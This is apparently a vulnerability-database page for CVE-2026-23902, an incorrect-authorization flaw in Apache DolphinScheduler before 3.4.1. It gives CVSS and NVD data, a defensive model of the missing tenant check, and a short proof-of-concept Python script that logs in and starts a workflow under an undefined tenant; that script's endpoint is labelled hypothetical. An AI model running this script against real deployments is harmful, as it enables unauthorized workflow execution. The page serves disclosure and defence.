Security Vulnerability Report
CVE-2026-23902 CVSS 8.1 HIGH

CVE-2026-23902

Published: 2026-04-24 12:17:06
Last Modified: 2026-04-27 13:42:29

Description

Incorrect Authorization vulnerability in Apache DolphinScheduler allows authenticated users with system login permissions to use tenants that are not defined on the platform during workflow execution. This issue affects Apache DolphinScheduler versions prior to 3.4.1. Users are recommended to upgrade to version 3.4.1, which fixes this issue.
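The following is an added illustration of the authorization gap the description names, not code from Apache DolphinScheduler or from the advisory, and it does not reproduce the project's API. The tenant, user and execution-record structures, the function names, and the idea that a tenant maps to an OS account are assumptions of this model. It contrasts the pre-fix pattern (a caller-chosen tenantCode is used as-is) with a server-side check that refuses any code not defined on the platform, and adds a retrospective scan of constructed execution records for the footprint such abuse would leave on a deployment that ran a version before 3.4.1.

```python
"""
Model of the CWE-863 pattern behind CVE-2026-23902 (added example; not
DolphinScheduler code). All names and data shapes are assumptions.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Tenant:
    code: str
    os_user: str  # account tasks would run under; an assumption of this model


@dataclass
class User:
    name: str
    tenant_codes: set = field(default_factory=set)  # tenants the user is bound to (assumed)


# Constructed platform state: the only tenants an administrator has defined.
DEFINED_TENANTS = {
    "etl": Tenant("etl", "etl"),
    "analytics": Tenant("analytics", "analytics"),
}


def resolve_tenant_vulnerable(request_tenant_code: str, user: User,
                              tenants=DEFINED_TENANTS) -> str:
    """Pre-fix pattern: the caller-supplied tenant code is used as-is.
    Nothing checks that it names a defined tenant, so any authenticated
    user can steer execution to a tenant the platform never defined."""
    return request_tenant_code


def authorize_tenant(request_tenant_code: str, user: User,
                     tenants=DEFINED_TENANTS) -> tuple:
    """Fixed pattern: decide from server-side state, not from the request.

    Returns (allowed, detail). The tenant must exist on the platform and the
    requesting user must be bound to it. Both checks use the lookup result,
    never the raw request string, so unknown codes cannot slip through."""
    tenant = tenants.get(request_tenant_code)
    if tenant is None:
        return False, f"tenant {request_tenant_code!r} is not defined on the platform"
    if tenant.code not in user.tenant_codes:
        return False, f"user {user.name!r} is not bound to tenant {tenant.code!r}"
    return True, tenant.code


def resolve_tenant_fixed(request_tenant_code: str, user: User,
                         tenants=DEFINED_TENANTS) -> str:
    """Execution path that refuses instead of falling through."""
    allowed, detail = authorize_tenant(request_tenant_code, user, tenants)
    if not allowed:
        raise PermissionError(detail)
    return detail  # the resolved tenant code


# Constructed execution records (field names are assumptions) for a
# retrospective check on a deployment that ran a pre-3.4.1 version.
SAMPLE_EXECUTIONS = [
    {"user": "alice", "processDefinitionCode": 1, "tenantCode": "etl"},
    {"user": "bob", "processDefinitionCode": 7, "tenantCode": "NON_EXISTENT_TENANT_999"},
    {"user": "alice", "processDefinitionCode": 3, "tenantCode": "root"},
    {"user": "bob", "processDefinitionCode": 2, "tenantCode": "analytics"},
]


def find_undefined_tenant_executions(records, tenants=DEFINED_TENANTS) -> list:
    """Return records whose tenantCode matches no defined tenant: the
    footprint an abuse of this issue would leave in execution history."""
    return [r for r in records if r["tenantCode"] not in tenants]


if __name__ == "__main__":
    bob = User("bob", {"analytics"})
    print("vulnerable path accepts:", resolve_tenant_vulnerable("NON_EXISTENT_TENANT_999", bob))
    print("fixed path decides:", authorize_tenant("NON_EXISTENT_TENANT_999", bob))
    for rec in find_undefined_tenant_executions(SAMPLE_EXECUTIONS):
        print("undefined tenant in history:", rec)
```

The point of the fixed variant is that the decision is made on the object returned by the server-side lookup, so a request string that matches nothing has no path to execution; the second check (user bound to tenant) is the stricter policy a deployment would normally also want, and is an assumption of this model rather than a statement about what 3.4.1 does.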

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:* - VULNERABLE
Apache DolphinScheduler < 3.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The execution endpoint and request fields in the script are hypothetical (the script's own comment says so) and have not been verified against a vulnerable build; an HTTP 200 alone does not prove the undefined tenant was accepted, so inspect the response body.
```python
import requests

# Target configuration
TARGET_URL = "http://localhost:12345/dolphinscheduler"
USERNAME = "low_priv_user"
PASSWORD = "password"


def login():
    """Authenticate with the application to get a session token."""
    session = requests.Session()
    login_payload = {
        "userName": USERNAME,
        "userPassword": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/login", data=login_payload)
    if response.status_code == 200:
        print("[+] Login successful")
        return session
    else:
        print("[-] Login failed")
        return None


def exploit(session):
    """Exploit the authorization bypass to use an undefined tenant."""
    # Payload attempting to execute a workflow with a non-existent tenant
    exploit_data = {
        "processDefinitionCode": 1,
        "scheduleTime": "2026-04-24 12:00:00",
        "tenantCode": "NON_EXISTENT_TENANT_999",
        "execUser": USERNAME
    }
    headers = {"Content-Type": "application/json"}
    print(f"[*] Attempting to execute workflow with tenant: {exploit_data['tenantCode']}")
    # Endpoint to execute workflow (hypothetical based on API structure)
    exec_url = f"{TARGET_URL}/projects/test/executors/start-process-instance"
    response = session.post(exec_url, json=exploit_data, headers=headers)
    # Note: a 200 status alone does not show the tenant was accepted;
    # the response body is printed so the caller can check it.
    if response.status_code == 200:
        print("[+] Exploit successful! Workflow executed with undefined tenant.")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Exploit failed or endpoint changed.")


if __name__ == "__main__":
    sess = login()
    if sess:
        exploit(sess)
```

References

https://lists.apache.org/thread/hy4ntb2gys8150zfmnxhsd5ph0hoh7s9 (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/24/1 (Mailing List, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23902",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-24T12:17:06.453",
    "lastModified": "2026-04-27T13:42:29.420",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Incorrect Authorization vulnerability in Apache DolphinScheduler allows authenticated users with system login permissions to use tenants that are not defined on the platform during workflow execution.\n\nThis issue affects Apache DolphinScheduler versions prior to 3.4.1. \n\nUsers are recommended to upgrade to version 3.4.1, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.4.1",
                "matchCriteriaId": "AD2DFC41-4AAE-4940-A40C-94421F0024DC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/hy4ntb2gys8150zfmnxhsd5ph0hoh7s9",
        "source": "[email protected]",
        "tags": [
          "Mailing List",
          "Vendor Advisory"
        ]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/04/24/1",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": [
          "Mailing List",
          "Third Party Advisory"
        ]
      }
    ]
  }
}
```